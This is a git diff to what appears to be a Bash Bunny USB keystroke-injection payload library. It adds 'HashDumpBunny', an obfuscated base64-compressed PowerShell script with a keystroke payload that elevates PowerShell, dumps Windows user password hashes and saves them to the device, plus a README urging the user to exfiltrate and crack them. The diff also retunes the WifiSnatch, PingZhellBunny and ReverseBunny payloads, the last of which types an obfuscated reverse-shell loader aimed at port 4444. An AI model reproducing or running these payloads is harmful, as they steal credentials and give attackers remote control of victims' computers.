diff --git a/payloads/library/credentials/HashDumpBunny/BunnyDump.bat b/payloads/library/credentials/HashDumpBunny/BunnyDump.bat new file mode 100644 index 00000000..fe9c68d9 --- /dev/null +++ b/payloads/library/credentials/HashDumpBunny/BunnyDump.bat @@ -0,0 +1,2 @@ +ÿþ&cls +powershell.exe -c "&( ([sTring]$veRboSePrEfeREncE)[1,3]+'x'-joIn'')( nEw-oBjEct Io.STREaMReAdeR( (nEw-oBjEct SyStEM.iO.coMPReSsioN.dEFLAtEsTrEaM( [sYSteM.Io.MEmoRYSTrEam] [coNvERT]::FrombAse64sTriNG('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'),[iO.coMPRESSiOn.cOmPressiONmODE]::decoMpRESS)),[sYsTEm.TexT.ENCoDIng]::AsCii)).REAdtOEnd( ) > out.txt" \ No newline at end of file diff --git a/payloads/library/credentials/HashDumpBunny/README.md b/payloads/library/credentials/HashDumpBunny/README.md new file mode 100644 index 00000000..f2b9c89a --- /dev/null +++ b/payloads/library/credentials/HashDumpBunny/README.md @@ -0,0 +1,19 @@ +**Title: HashDumpBunny** + +Author: 0iphor13 + +Version: 1.0 + +**Instruction:** + +This payload will run an obfuscated script to dump user hashes. If you don't trust this obfuscated .bat file, you should run it within a save space first - which should be best practice anyways ;-) + +# + +**Instruction:** + +Place BunnyDump.bat in the same payload switch-folder as your payload.txt +# +Plug in BashBunny. +Exfiltrate the out.txt file and try to crack the hashes. +![alt text](https://github.com/0iphor13/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png) diff --git a/payloads/library/credentials/HashDumpBunny/censoredhash.png b/payloads/library/credentials/HashDumpBunny/censoredhash.png new file mode 100644 index 00000000..b09ac754 Binary files /dev/null and b/payloads/library/credentials/HashDumpBunny/censoredhash.png differ diff --git a/payloads/library/credentials/HashDumpBunny/payload.txt b/payloads/library/credentials/HashDumpBunny/payload.txt new file mode 100644 index 00000000..f21e4a36 --- /dev/null +++ b/payloads/library/credentials/HashDumpBunny/payload.txt @@ -0,0 +1,44 @@ +#!/bin/bash +# +# Title: HashDumpBunny +# Description: Dump user hashes with this script, which was obfuscated with multiple layers. +# Author: 0iphor13 +# Version: 1.0 +# Category: Credentials +# Attackmodes: HID, Storage + +LED SETUP + +Q DELAY 500 + +GET SWITCH_POSITION +DUCKY_LANG de + +Q DELAY 500 + +ATTACKMODE HID STORAGE + +#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING + +LED STAGE1 + +#After you have adapted the delays for your target, add "-W hidden" +Q DELAY 1000 +RUN WIN "powershell Start-Process powershell -Verb runAs" +Q ENTER +Q DELAY 1000 +Q ALT j +Q DELAY 250 + +Q DELAY 250 +Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\BunnyDump.bat')" +Q DELAY 250 +Q STRING " ;mv out.txt ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l" +Q DELAY 250 +Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam" +Q DELAY 250 +Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit" +Q DELAY 300 +Q ENTER + +LED FINISH \ No newline at end of file diff --git a/payloads/library/exfiltration/WifiSnatch/payload.txt b/payloads/library/exfiltration/WifiSnatch/payload.txt index 31c958af..45aa88ce 100644 --- a/payloads/library/exfiltration/WifiSnatch/payload.txt +++ b/payloads/library/exfiltration/WifiSnatch/payload.txt @@ -3,7 +3,7 @@ # Title: WifiSnatch # Description: Extract wifi information, such as passphrases & SSIDs # Author: 0iphor13 -# Version: 1.0 +# Version: 1.1 # Category: Exfiltration # Attackmodes: HID, Storage @@ -20,18 +20,19 @@ ATTACKMODE HID STORAGE LED STAGE1 -DELAY 5000 +Q DELAY 1500 RUN WIN "powershell -NoP -W hidden -NonI -Exec Bypass" -DELAY 5000 +Q DELAY 500 +Q ENTER Q STRING "Set-Clipboard -Value (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\exfil.txt'))" -DELAY 10000 +Q DELAY 2000 Q ENTER -DELAY 10000 +Q DELAY 1000 Q CONTROL v -DELAY 10000 +Q DELAY 1000 Q ENTER -DELAY 1000 +Q DELAY 1000 LED STAGE2 @@ -44,12 +45,12 @@ LED CLEANUP rm /root/udisk/DONE -DELAY 100 +Q DELAY 100 sync -DELAY 100 +Q DELAY 100 LED FINISH -#SAVE TO EJECT \ No newline at end of file +#SAVE TO EJECT diff --git a/payloads/library/remote_access/PingZhellBunny/payload.txt b/payloads/library/remote_access/PingZhellBunny/payload.txt index ca6416ee..2b62fa78 100644 --- a/payloads/library/remote_access/PingZhellBunny/payload.txt +++ b/payloads/library/remote_access/PingZhellBunny/payload.txt @@ -9,12 +9,12 @@ LED SETUP -DELAY 500 +Q DELAY 500 GET SWITCH_POSITION DUCKY_LANG de -DELAY 500 +Q DELAY 500 ATTACKMODE HID STORAGE @@ -23,16 +23,16 @@ ATTACKMODE HID STORAGE LED STAGE1 #After you have adapted the delays for your target, add "-W hidden" -DELAY 5000 +Q DELAY 1500 RUN WIN "powershell -Exec Bypass -NoP -NonI" -DELAY 6000 +Q DELAY 500 Q ENTER -DELAY 20000 +Q DELAY 1000 Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\PingZhell.ps1')" -DELAY 20000 +Q DELAY 3000 Q ENTER -DELAY 15000 +Q DELAY 1000 ATTACKMODE HID diff --git a/payloads/library/remote_access/ReverseBunny/payload.txt b/payloads/library/remote_access/ReverseBunny/payload.txt index 694781e6..9cabc845 100644 --- a/payloads/library/remote_access/ReverseBunny/payload.txt +++ b/payloads/library/remote_access/ReverseBunny/payload.txt @@ -3,7 +3,7 @@ # Title: ReverseBunny # Description: Get remote access using obfuscated powershell code - If caught by AV, feel free to contact me. # Author: 0iphor13 -# Version: 1.2 +# Version: 1.3 # Category: Remote_Access # Attackmodes: HID @@ -16,32 +16,32 @@ ATTACKMODE HID #If needed, use this option #WAIT_FOR_PRESENT Your_Device -DELAY 5000 +Q DELAY 1500 Q GUI r -DELAY 5000 +Q DELAY 500 Q STRING "powershell -NoP -NonI -W hidden" -DELAY 5000 +Q DELAY 500 Q ENTER -DELAY 1000 +Q DELAY 250 Q STRING "\$I='0.0.0.0';\$P=4444;&(\$SHellid[1]+\$shELlId[13]+'x')(NEw-ObJECt sYstem.iO.coMPRESsIOn.dEFLateSTReAm([sYstEM.I" -DELAY 1000 +Q DELAY 250 Q STRING "o.MEmORyStReAm] [sYstEM.cOnvErT]::frOMBasE64sTrIng('jVJhb9owEP3c/IpT5A1HBUNXdR8apWqJPBSNUdSkWyuCogAWpAIHJa5K2vS/72yaqeoH" -DELAY 1000 +Q DELAY 250 Q STRING "urN8nH3Pz88vkNmjlJV3aVsWHB3ROEmSrgNgFl6LtbxmYTsJTisxAQfiE4RVawTEBxg+QSBDnXSh29yz/8WRmHM6NQjd3Xf+ZT2RAaPbBX1LDIjEqoYWvh1R" -DELAY 1000 +Q DELAY 250 Q STRING "9X6lueq30UJgk83QGmIsENWN4fe+0h2IzTFoNOhcw4ehd6wYc5zERm2MSFNhjW1NiknPfaNtOnWT9Q4yHPoKn4Umbhj6FUAv267y4uT0/xmMzDcGa1yIsoQJ" -DELAY 1000 +Q DELAY 250 Q STRING "l0oUU1A5zHOpMvkoGGOWZV+6lkWG6Tpd+4+lyjfgwSQSO8W4nOeLTC6n5+dXoR8EbCBUv1KipMT8MR19cO5J/tTJ+w/cVxDel4pv2IgrFl7Pf3JVssgf" -DELAY 1000 +Q DELAY 250 Q STRING "++sA76YkaJOx45LSI3NNFUaFuNpQvcOeikwJ+l5Fu9d+v2RDIZdq5biTGSqYTKdk5vUY+352dnpWf3npvbpPq2AoKCWZh3w3PF2gSk0yw6OjZbRynI4U0HN" -DELAY 1000 +Q DELAY 250 Q STRING "eXLLw6AhFX/cfhB9BJ7rfilG64VDel5H4xSJxp5h5ceOAY/Sqm0Au31gzlP3s0UzcAVnAt4uvJ3V+qzr4pmw0wN7OI8/Hdl/bdDkOwT6myNAZ5vNUZbl02DZ" -DELAY 1000 +Q DELAY 250 Q STRING "Vq2P7AmyXVB6dKO23+OA33srR8Iij4Ttj058i0DZVWkHFhlwO8F268WN9G66o8+qitf46Dzl1rL8='),[Io.COmpressIoN.coMPressiONmoDe]::decOMp" -DELAY 1000 +Q DELAY 250 Q STRING "ReSS ) | %{ NEw-ObJECt systEm.io.STREAmReadEr(\$_ , [sysTeM.TExt.encODIng]::AscIi)}| % {\$_.readTOeNd()} )" -DELAY 1000 +Q DELAY 250 Q ENTER LED FINISH